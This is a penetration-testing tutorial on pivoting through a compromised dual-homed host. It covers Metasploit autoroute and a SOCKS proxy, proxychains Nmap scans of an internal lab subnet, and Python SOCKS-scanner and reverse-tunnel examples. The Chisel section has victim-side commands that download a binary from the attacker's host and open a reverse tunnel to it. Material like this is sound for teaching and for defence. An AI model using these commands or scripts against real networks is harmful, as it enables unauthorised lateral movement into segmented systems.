Pivoting & Tunneling

Pivoting is a technique used in penetration testing and cyber attacks where the attacker uses a compromised machine to move deeper into a network. By pivoting, an attacker can access different subnets that are not directly accessible from the attacker's original network. This allows the attacker to bypass network segmentation and access internal resources.

Introduction

Pivoting involves using a compromised host to relay traffic to other systems and subnets within the target network. This technique is essential for exploring network segments that are not directly accessible from the attacker's initial foothold. The compromised host acts as a bridge, forwarding traffic between the attacker and the internal targets.

Types of Pivoting

Network Pivoting (Layer 3):

  • Involves routing IP traffic through the compromised host to reach other network segments.

  • Utilizes routing and forwarding mechanisms.

Port Forwarding (Layer 4):

  • Involves forwarding specific ports from the attacker's machine to the target network through the compromised host.

  • Utilizes tools and techniques to forward traffic at the transport layer (TCP/UDP).

Application Layer Pivoting (Layer 7):

  • Involves tunneling application-specific traffic through the compromised host.

  • Utilizes proxies and application-level tunneling tools.

Tools Commonly Used for Pivoting

  • Metasploit Framework

  • Meterpreter

  • SSH (Secure Shell)

  • ProxyChains

  • SOCKS Proxy

  • Nmap

  • PowerShell Empire

  • Chisel

  • Plink (PuTTY Link)

  • Cobalt Strike

  • Impacket

  • FoxyProxy

  • MSFvenom

  • RDP (Remote Desktop Protocol)

  • Netcat

A real-world example of pivoting: an attacker sitting on the 192.168.x.x segment compromises a dual-homed host and uses its second network interface card (NIC) to reach the internal segment behind it (lateral movement).

Pivoting to the internal (different) subnet of the victim machine:

  1. It is assumed that we have already compromised the host File02 and have a Meterpreter reverse shell with low privileges (bdc\paul) in Metasploit (MSF) on the attacker machine (ParrotOS).

  2. On File02 we can see a second, internal NIC with the IP address 172.16.69.4.

  3. Since our goal is to reach the internal segment (172.16.69.x) of the victim, we need to add a route through the session. This is done from MSF:

Background the Meterpreter session (here session 2) with the background command, then use the autoroute post module to add the route:

use post/multi/manage/autoroute
set SUBNET 172.16.69.0   # internal subnet of the target; NETMASK defaults to 255.255.255.0
set SESSION 2
run
  4. Once the route is added, only Metasploit modules can use it. To run external tools such as Nmap through the pivot, start a SOCKS listener with the auxiliary/server/socks_proxy module. Change the default SRVPORT (1080) to 9050 so it matches the proxy entry in the stock proxychains config. One check before moving on: the module defaults to SOCKS5, while the stock proxychains4.conf lists a socks4 proxy; either set VERSION 4a in the module or change the proxychains entry to socks5 127.0.0.1 9050, otherwise every connection will fail at the handshake.

Commands:

use auxiliary/server/socks_proxy
show options
set SRVPORT 9050
run
  5. Use netstat to verify that the proxy is listening on 9050:

netstat -tpln
  6. Scan the target machine with Nmap over proxychains. Two flags are required: -sT, because a SOCKS proxy can only relay full TCP connections (no raw packets, so no SYN scan), and -Pn, because ICMP and ARP host discovery cannot travel through the proxy either. No proxychains port change is needed here only because we deliberately started the listener on 9050, the port in the default config.

proxychains nmap -sT -Pn 172.16.69.4 -v

We got a success :)

We can see the open ports on File02 by scanning into the other subnet (172.16.69.0/24):

Output for File01 (172.16.69.32) (scan output is in the original screenshot):

Output for Backup_dc (BDC, 172.16.69.70), the Active Directory domain controller (scan output is in the original screenshot):

Check the proxychains config before running anything through it; the proxy type, host and port in the [ProxyList] section must match the listener you started:

nano /etc/proxychains4.conf
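To make the -sT/-Pn point concrete, the following script does what proxychains does for nmap but by hand: it opens a TCP connection to the SOCKS listener, sends a CONNECT for each target port, and reads the port state off the proxy's reply code. This is an added example for this page, not code from the original write-up or from Metasploit; the proxy address (127.0.0.1:9050), the target (172.16.69.4) and the port list are placeholders matching the lab above. It also handles the SOCKS4/4a framing, which is what a default proxychains4.conf speaks.

```python
"""Connect-scan an internal host through the SOCKS listener the pivot exposes
(here Metasploit's socks_proxy on 127.0.0.1:9050), speaking SOCKS4/4a or SOCKS5
by hand instead of via proxychains. Added example for this page, not part of the
original write-up or of any tool; proxy and target addresses are placeholders."""
import socket
import struct

SOCKS5_REPLIES = {
    0x00: "open",            # pivot completed the TCP handshake with the target
    0x01: "general failure",
    0x02: "blocked by ruleset",
    0x03: "network unreachable",
    0x04: "host unreachable",
    0x05: "closed",          # target answered with RST (connection refused)
    0x06: "ttl expired",
    0x07: "command not supported",
    0x08: "address type not supported",
}


def _is_ipv4(host: str) -> bool:
    try:
        socket.inet_aton(host)
        return True
    except OSError:
        return False


def socks5_connect_request(host: str, port: int) -> bytes:
    """RFC 1928 CONNECT. Dotted IPs go as ATYP 1; names go as ATYP 3 so the
    pivot, not the attacker box, resolves them (the reason proxychains has proxy_dns)."""
    if _is_ipv4(host):
        addr = b"\x01" + socket.inet_aton(host)
    else:
        name = host.encode()
        addr = b"\x03" + bytes([len(name)]) + name
    return b"\x05\x01\x00" + addr + struct.pack(">H", port)


def parse_socks5_reply(data: bytes) -> str:
    if len(data) < 2 or data[0] != 0x05:
        return "bad reply"
    return SOCKS5_REPLIES.get(data[1], "unknown reply %d" % data[1])


def socks4_connect_request(host: str, port: int) -> bytes:
    """SOCKS4 CONNECT: VN=4, CD=1, DSTPORT, DSTIP, empty USERID. For a hostname
    use the 4a form: DSTIP 0.0.0.1 and the NUL-terminated name after USERID."""
    head = b"\x04\x01" + struct.pack(">H", port)
    if _is_ipv4(host):
        return head + socket.inet_aton(host) + b"\x00"
    return head + b"\x00\x00\x00\x01" + b"\x00" + host.encode() + b"\x00"


def parse_socks4_reply(data: bytes) -> str:
    if len(data) < 2 or data[0] != 0x00:
        return "bad reply"
    return "open" if data[1] == 0x5A else "closed or refused"   # 0x5A granted, 0x5B-0x5D rejected


def probe(proxy: tuple, target: str, port: int, version: int = 5, timeout: float = 5.0) -> str:
    """One full TCP connect through the proxy; the reply code is the port state."""
    try:
        with socket.create_connection(proxy, timeout=timeout) as s:
            if version == 5:
                s.sendall(b"\x05\x01\x00")            # greeting: one method offered, NO AUTH
                if s.recv(2) != b"\x05\x00":
                    return "proxy refused no-auth"
                s.sendall(socks5_connect_request(target, port))
                return parse_socks5_reply(s.recv(262))
            s.sendall(socks4_connect_request(target, port))
            return parse_socks4_reply(s.recv(8))
    except socket.timeout:
        return "filtered"                            # neither SYN-ACK nor RST before the timeout


def scan(proxy: tuple, target: str, ports, version: int = 5) -> dict:
    return {p: probe(proxy, target, p, version) for p in ports}


if __name__ == "__main__":
    PROXY = ("127.0.0.1", 9050)                      # the socks_proxy SRVPORT from the steps above
    results = scan(PROXY, "172.16.69.4", [22, 80, 135, 139, 445, 3389])
    for port, state in sorted(results.items()):
        print(f"{port:5d}/tcp  {state}")
```

Run it with version=5 against the Metasploit listener as configured above, or version=4 if you set VERSION 4a. A "closed" result means the pivot host actually received an RST from the target, so the route and the proxy are working even when nothing is open; a run where every port comes back "general failure" usually means the autoroute is missing rather than the target being down.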

Extras:

We can also open an RDP session to File01 (172.16.69.32) through the same proxy with rdesktop.

Port Forwarding on Linux Machine without having ssh credentials

Port Forwarding using Chisel:

Chisel is a very useful tool that comes in handy for forwarding a local port on a Linux machine back to the attacker's machine.

Its best feature is that NO credentials (such as SSH credentials) are required on the victim: the victim only makes an outbound connection. Run Chisel as a server on the attacker machine, upload the same chisel executable to the victim, and run it there as a client as follows:

  1. On the attacker machine (e.g. Parrot/Kali):

./chisel server -p 9999 --reverse
  2. On the target/victim machine (assuming the attacker is also serving the binary over HTTP on 10.10.14.9:8000; that port is on the attacker and is unrelated to the victim's local 8000):

wget http://10.10.14.9:8000/chisel
chmod +x chisel
./chisel client 10.10.14.9:9999 R:8010:127.0.0.1:8000

Here 9999 is the port the Chisel server is listening on on the attacker machine (Parrot); 127.0.0.1:8000 is the port we want to forward (e.g. a Laravel application listening only on localhost:8000 on the Linux victim); and 8010 is the new port on the attacker machine on which that application becomes reachable. The R: prefix makes it a reverse forward: the listener is opened on the server (attacker) side.

  3. To access the forwarded application (victim port 8000, now exposed as 8010) from the attacker machine:

http://localhost:8010/
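The mechanism behind that R:8010:127.0.0.1:8000 remote, in plain Python sockets, as an added example for this page (this is not chisel's code and does not come from the original write-up). Chisel multiplexes every stream over one encrypted websocket; this toy instead dials one plain TCP connection per stream, but the security-relevant property is identical: the victim only ever connects out to the attacker, so no SSH credentials and no inbound firewall opening on the victim are needed. The demo() function runs all three roles on loopback with ephemeral ports; the echo service standing in for the Laravel app is constructed.

```python
"""Toy reverse port forward illustrating chisel's R:<listen>:<host>:<port> remote.
Added example, not chisel's code: one plaintext TCP connection per stream,
no multiplexing, no encryption. Not for use on a real engagement."""
import queue
import socket
import threading


def parse_remote(spec: str):
    """Parse chisel's reverse remote syntax R:<listen-port>:<host>:<port>."""
    parts = spec.split(":")
    if parts[0] != "R" or len(parts) != 4:
        raise ValueError("expected R:<listen-port>:<host>:<port>, got %r" % spec)
    return int(parts[1]), parts[2], int(parts[3])


def _pipe(src: socket.socket, dst: socket.socket) -> None:
    """Copy bytes one way until EOF, then half-close dst so the EOF propagates."""
    try:
        while True:
            chunk = src.recv(4096)
            if not chunk:
                break
            dst.sendall(chunk)
    except OSError:
        pass
    finally:
        try:
            dst.shutdown(socket.SHUT_WR)
        except OSError:
            pass


def _bridge(a: socket.socket, b: socket.socket) -> None:
    t = threading.Thread(target=_pipe, args=(b, a), daemon=True)
    t.start()
    _pipe(a, b)
    t.join()
    a.close()
    b.close()


def _listener(host: str, port: int) -> socket.socket:
    s = socket.socket()
    s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    s.bind((host, port))
    s.listen()
    return s


class TunnelServer:
    """Attacker side (what `chisel server --reverse` provides): exposes listen_port
    locally and accepts the victim's outbound control/data connections on tunnel_port.
    Port 0 lets the OS pick a free port (used by demo())."""

    def __init__(self, host="127.0.0.1", listen_port=0, tunnel_port=0):
        self.public = _listener(host, listen_port)
        self.tunnel = _listener(host, tunnel_port)
        self.pending = queue.Queue()

    def serve(self) -> None:
        control, _ = self.tunnel.accept()          # the victim's first dial-out is the control channel
        threading.Thread(target=self._collect_data, daemon=True).start()
        while True:
            user, _ = self.public.accept()         # e.g. the attacker's browser hitting 8010
            control.sendall(b"NEW\n")              # ask the victim to dial back one data channel
            data = self.pending.get()              # pair it with this user connection, in order
            threading.Thread(target=_bridge, args=(user, data), daemon=True).start()

    def _collect_data(self) -> None:
        while True:
            data, _ = self.tunnel.accept()
            self.pending.put(data)


def tunnel_client(server: tuple, target: tuple) -> None:
    """Victim side (what `chisel client ... R:...` does): holds one outbound control
    connection; on each NEW it connects out to the server and to the local target
    (e.g. 127.0.0.1:8000) and bridges the two."""
    control = socket.create_connection(server)
    for line in control.makefile("rb"):
        if line.strip() == b"NEW":
            data = socket.create_connection(server)
            local = socket.create_connection(target)
            threading.Thread(target=_bridge, args=(data, local), daemon=True).start()


def demo(payload: bytes = b"GET / HTTP/1.0\r\n\r\n") -> bytes:
    """All three roles on loopback: a constructed echo service standing in for the
    app on the victim, the server on the attacker, the client dialing out, then one
    request through the forwarded port. Returns what the attacker's socket got back."""
    app = _listener("127.0.0.1", 0)

    def app_loop():
        while True:
            c, _ = app.accept()
            c.sendall(b"echo:" + c.recv(4096))
            c.close()

    threading.Thread(target=app_loop, daemon=True).start()
    srv = TunnelServer()
    threading.Thread(target=srv.serve, daemon=True).start()
    threading.Thread(target=tunnel_client, daemon=True,
                     args=(srv.tunnel.getsockname(), app.getsockname())).start()

    user = socket.create_connection(srv.public.getsockname(), timeout=5)
    user.sendall(payload)
    out = b""
    while True:
        chunk = user.recv(4096)
        if not chunk:
            break
        out += chunk
    user.close()
    return out


if __name__ == "__main__":
    print(parse_remote("R:8010:127.0.0.1:8000"))
    print(demo())
```

Two things worth noticing when reading it next to the chisel command: the victim never listens on anything, so there is nothing for an inbound firewall to block, and the only evidence on the victim is an outbound TCP session to the attacker, which is the kind of egress connection defenders should be alerting on from a file server.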

Conclusion

Pivoting within a network is a critical technique used by attackers to move laterally and gain access to additional network segments. By exploiting compromised hosts and leveraging tools and techniques such as Metasploit, SSH tunneling, and proxy chains, attackers can bypass network segmentation and access otherwise isolated systems. Understanding these methods is essential for penetration testers to simulate real-world attack scenarios and for defenders to implement effective countermeasures.

Effective network defense strategies should include robust network segmentation, continuous monitoring, strong access controls, and regular security assessments. By doing so, organizations can reduce the risk of lateral movement and improve their overall security posture. Ensuring that security measures are in place to detect and respond to pivoting activities is crucial for maintaining the integrity and confidentiality of critical network resources.

Nowadays, Endpoint Detection and Response (EDR) solutions are capable of detecting and preventing these types of attacks. However, advanced hacking techniques can still circumvent these defenses.

These sophisticated methods are an integral part of what we teach in our live Red Teaming sessions, enabling security professionals to stay ahead of the latest threats and enhance their defensive capabilities.
